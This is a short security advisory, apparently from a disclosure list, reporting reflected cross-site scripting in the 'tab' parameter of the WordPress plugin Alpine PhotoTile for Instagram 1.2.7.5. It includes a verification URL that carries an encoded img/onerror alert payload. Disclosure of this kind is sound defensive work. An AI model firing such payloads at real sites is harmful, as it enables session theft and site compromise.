Subject: Cross-Site Scripting (XSS) in Alpine PhotoTile for Instagram 1.2.7.5

Date: Thu, 20 Aug 2015 11:55:29 +0200

Hello,

Plugin: Alpine PhotoTile for Instagram 1.2.7.5 https://wordpress.org/plugins/alpine-photo-tile-for-instagram/

1. Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: http://localhost/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=[xss]

Url: GET

Vulnerable parameters: tab

Example PHP callstack:

PhotoTileForInstagramAdmin::admin_build_settings_page [/alpine-photo-tile-for-instagram/gears/alpinebot-admin.php:793]

Verification:

http://localhost/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,